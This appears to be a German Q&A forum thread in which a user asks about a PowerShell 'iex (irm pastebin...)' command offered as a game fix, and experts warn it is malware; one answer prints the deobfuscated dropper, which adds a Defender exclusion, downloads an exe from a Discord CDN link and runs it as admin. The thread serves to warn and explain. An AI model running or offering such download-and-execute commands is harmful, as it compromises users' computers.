Was ist das iex (irm 'https://pastebin.pl/view/raw/940cb634')?

Jemand sagt mir er kann mein game fixen wenn ich das in Powershell mache was ist das

2 Antworten

Von gutefrage auf Grund seines Wissens auf einem Fachgebiet ausgezeichneter Nutzer

PowerShell, Programmieren & Softwareentwicklung

07.12.2023, 15:18

Finger weg!

irm ist der Alias für Invoke-RestMethod. In diesem Fall lädt dieses Cmdlet ein Powershellscipt von Pastebin. und führt es aus.

Das dortige Script ist enthält mehrfach verschlüsselten und komprimierten Code.

nach dessen Auflösung bleibt folgendes (Schad?)Script:

$url = "https://cdn.discordapp.com/attachments/...aus   Sicherheitsgründen entfernt..."

$desktopPath = [System.Environment]::GetFolderPath('Desktop')
$outputPath = [System.IO.Path]::Combine($desktopPath, "spoofer.exe")

if ($desktopPath -ne $null -and $desktopPath -ne '') {
  Add-MpPreference -ExclusionPath $desktopPath
  Write-Host "Computer Supported."
} else {
  Write-Host "Error: Computer not supported"
}

try {
  Invoke-RestMethod -Uri $url -OutFile $outputPath
  Write-Host "Initialized Spoofer!"
}
catch {
  Write-Host "Error Replacing Windows Corrupted Files $_"
}

Start-Process -FilePath $outputPath -Verb RunAs

Write-Host "Spoofed!"

Dies lädt eine exe-Datei (VantaSpoofer.exe) auf den Desktop, versucht eine Defender- Ausnahme für den Desktopordner und dessen Dateien einzurichten und die heruntergeladene Exe mit Adminrechten auszuführen.

Ich habe keine Ahnung was VantaSpoofer.exe tut, soweit habe ich die Sache nicht kommen lassen. Ohne abgeschalteten Defender sperrt dieser den Download sofort. ---ergo ist das Teil gefährlich

Immer wenn IEX bzw. Invoke-Exprssion im spiel ist sollte man genau wissen, was der der übergebene String bewirkt. iex führt einen String als Code aus!

So nützlich iex für einen redlichen Programmierer auch gelegentlich sein mag, in böswilligen Händen kann man damit sogar das Kochbuch von Tante Erna in eine Atombombe verwandeln 😅

Woher ich das weiß:eigene Erfahrung – Ich mach das seit 30 Jahren

pcnoob15212

Fragesteller

10.12.2023, 16:19

Danke

MeoseK

07.12.2023, 14:18

Die lange Zeichenkette in der Mitte vom Code ist verschlüsselt. Der Code entschlüsselt diese Zeichenkette (sie beinhaltet weiteren Code), und führt diesen Code aus. Wahrscheinlich installiert oder löscht es etwas von deinem Rechner.

Führe nie Code in der Powershell aus, den dir jemand über's Internet geschickt hat. WENN die Person gute Intentionen hätte, würde sie keinen verschlüsselten Code schicken.

Diese Verschlüsselung wird eingesetzt, damit Antivirus-Programme den schädlichen Skript nicht finden, und beim Ausführen ist es schon zu spät.

Erzesel

07.12.2023, 15:53

Ich sags mal so, da hat sich jemand extrem viel mühe gegeben um einen anundfürsich relativ belanglosen Code zu tarnen. Allerdings ist die Mehrfache Verschüsselung Schwachsinn, da der Code sich ohnehin selbst entschlüsselt.

Man muss lediglich das Cmdlet IEX durch eine entschärfte Version überschreiben... und vor Ausführung den String anzeigen

function Invoke-Expression {
    [cmdletbinding()]
    param(
        [Parameter(Mandatory,ValueFromPipeline)]
        $string)
        Write-Host $string  -fo green
        Write-Host Press Enter to Execute Code,  or Press CTRL-C  -fo  red
        Read-Host
        Microsoft.PowerShell.Utility\Invoke-Expression $string
}

damit ist die Gefahr vom Tisch

Ich habe in Unity ein project mit dem template unity 3d (urp) erstellt. Aber die global volume die ich erstellt habe ist nur im game mode sichtbar nicht in der scene view! Wie kann ich das fixen?

...zur Frage

xml PowerShell Element Attribut ändern?

Hi,

ich versuche in einer xml Datei mit PowerShell etwas wie folgt zu ändern:

Hier soll xmlns ganz verschwinden bzw. mind. der Link

Liebe Grüße

...zur Frage

Powershell auf Ubuntu 21.04?

Hallo,

gibt es zur Zeit eine Möglichkeit Powershell 7 auf Ubuntu 21.04 zu installieren? In den Docs steht nur 20.04 und das funktioniert unter 21.04 nicht.

https://docs.microsoft.com/de-de/powershell/scripting/install/installing-powershell-core-on-linux?view=powershell-7.1

...zur Frage

Wie kann ich Plain Text Programm Code ausführen?

Ich möchte gern folgenden Code ausführen:

https://pastebin.pl/view/35f0229b

Hab mir dazu eine ausführbare Batch Datei erstellt. Aber es funktioniert nicht. Es werden 3 weitere Textdateien (json, re und requests) ohne Inhalt erstellt.

Was mache ich falsch?

...zur Frage

Unity: Game-View zeigt nicht was sie soll?

Die Unity Game-View ist bei mir irgendwie verbuggt, in Camera-Preview sieht alles so aus wie es soll. Wenn ich eine andere Waffe wähle, funktioniert alles perfekt. Nur wenn ich das Sturmgewehr auswähle ist das FOV irgendwie extrem und alle Controls sind invertiert. In der Camera Preview und im Inspector sind alle FOV Werte normal und exakt so, wie sie sein sollten.

Video:

https://youtu.be/ohSGhIixCsE

VIELEN DANK!

...zur Frage

Windows PowerShell geht nicht?

Ich will das PS C: in PS D: ändern, es geht aber nicht. Ich will das machen, weil sich bei Visual Studio Code durch den Terminal npm start, die Seite von React native nicht starten lässt. Und in einem YTV zeigt jemand wie man es anscheinend fixen kann, aber das erste was er macht ist das mit dem: ( cd d: ) ,und ich weiß nicht wie das geht.

...zur Frage

Grundsatzfrage zu Powershell Backup-Script?

Hallo,

ich habe mir gerade ein OpenMediaVault Nas eingerichtet.

Darauf möchte ich per Powershell-Script ein tägliches Backup meiner:

Fotos (viele Dateien in JPG und Raw)
Videos (MPG4 große Dateien)
wichtigste Windows-Ordner (z.b. Dokumente bzw. der ganze Benutzer Ordner)

durchführen.

Zusätzlich möchte ich noch die Möglichkeit haben Dateien und Ordner auszuschließen.

Ich hatte sowas ähnliches mal von Linux aus mit RSYNC, aber aktuell benutze ich kein Linux mehr (sondern Windows).

Als hier meine Frage:

Was ist empfehlenswerter? Das kopieren der Dateien über Robocopy, WinSCP (hab ich im endeffekt nur eine Überschrift gelesen) oder doch wieder RSYNC (über WSL)?

Ich müsste mich bei allen wieder stark einlesen und möchte daher einen Anhaltspunkt mit was ich anfangen soll.

Hat da jemand Erfahrungen?

...zur Frage

Powershell in .txt Punkt (.) durch etwas anderes ersetzen?

$old2= "."
$new2= ","
(get-content C:\Users\...\OldFile.txt -Raw) -replace $old2,$new2>C:\Users\...\NewFile.txt

Dieser Ausschnitt funktioniert soweit, wenn ich z.b. a´s ersetze ersetzt er wirklich nur a´s aber bei Punkten ersetzt er jedes einzelnes Zeichen.

Steht der Punkt ( . ) irgendwie für alles?
Wie kann ich meine Pünktchen ersetzen?

Benutze Powershell 5.1

...zur Frage

PS ise "Write-SqlTableData" Username/PW Parameter?

Bei der Funktion Write-SqlTableData" (https://docs.microsoft.com/en-us/powershell/module/sqlserver/write-sqltabledata?view=sqlserver-ps) sind folgende Parameter angegeben:

(Get-Process | Select-Object -Property Id,ProcessName,StartTime,UserProcessorTime,WorkingSet,Description) |
         Write-SqlTableData -ServerInstance "MyServer\MyInstance" -DatabaseName "MyDatabase" -SchemaName "dbo" -TableName "TaskManagerDump" -Force

Gibt es eine möglichkeit Powershell bzw. SQL Benutzernamen und Passwort zu geben?

...zur Frage

Unity Prefabs werden nur in der Scene View angezeigt?

Hallo ich habe ein Problem in Unity und zwar werden meine Prefabs die im Verlauf des Spiels generiert werden sollen nur in der Scene View angezeigt aber halt nicht in der Game View. Woran kann das liegen ? ? ?

...zur Frage

Funktionieren Remote Popups via Powershell Skript?

Hey,

Ich habe für das Unternehmen indem ich Arbeite ein Powershell Script geschrieben in welchem jeder PC der in einer Gewissen IP-Range ist und einer bestimmten Gruppe angehört, sowie Eingeschalten ist (ping) automatisch mit einem Shutdown Befehl heruntergefahren wird.

Der Benutzer hat mit dem derzeitigen Script nicht die Möglichkeit diesen Shutdownbefehl abzulehnen. Ich habe mehrere Möglichen PopUp-Fenster ausprobiert doch ohne erfolg.

ICh habe jetzt diesen Beitrag gefunden:

https://powershell.org/forums/topic/send-pop-up-to-remote-computer-using-powershell/

Ist dieser Aktuell und stimmt es das keine Remote Pupups funktionieren.

Sollte jemand eine Lösung haben bitte diese zukommen lassen.

Danke im voraus.

LG, Alex

...zur Frage

BITS in Powershell funktioniert nicht?

Was mache ich falsch,hier das was ich in die batch datei geschrieben hab:

@echo off

echo blablabla

pause

Powershell -Executionpolicy Bypass -Command "Start-BitsTransfer -Source https://websitevonderdatei.com -Destination %userprofile%\Desktop"

start %userprofile%\Desktop\datei.blablabla

Wenn ich das starte,kommt ganze zeit nur "connecting" egal ob mit admin oder nich,woran kann das liegen?

...zur Frage

Powershell - Datei herunterladen und starten?

Untertitel: Wie mache ich einen command-prompt Virenscan per Script?

Ich bin dabei meine Wartungsarbeiten zu automatisieren.

Hier liegt mein Lieblingsmalwarescanner.

https://docs.microsoft.com/de-de/windows/security/threat-protection/intelligence/safety-scanner-download

Er wird alle 10 Tage akutalisiert und läuft danach nicht mehr. D.h. Ich muss ihn stets neu herunterladen. Meine Fragen:

wie kann ich ihn mit der Powershell herunterladen?
kann ich ihn gar starten?
und jetzt bin ich ganz verwegen: Gibt es Parameter, die ich beim Starten übergeben kann, die mir die üblichen Fragen, dass ich den AGB zustimme und dass ich nur den Quicksan tun möchte - übergeben?
wenn ja, wie gebe ich den command prompt mit den Parametern in die Powershell ein?

danke!

...zur Frage

Sie können keine Methode für einen Ausdruck mit dem Wert NULL aufrufen.?

Ich arbeite hier gerade mit Powershell und dieser Fehler ist erschienen.

Ich weiß, dass powershell es nicht zulässt, dass man Methoden mit Variablen benutzt, die $null sein könnten ich weiß bloß leider nicht wie ich das fixen kann.

ich habe schon versucht das zu verändern indem ich davor eine if abfrage setze , welche fragt ob $x = 0 ist aber es hat leider auch nicht funktioniert.

Ich wäre sehr dankbar über eure Hilfe.

...zur Frage

Was möchtest Du wissen?

Deine Frage stellen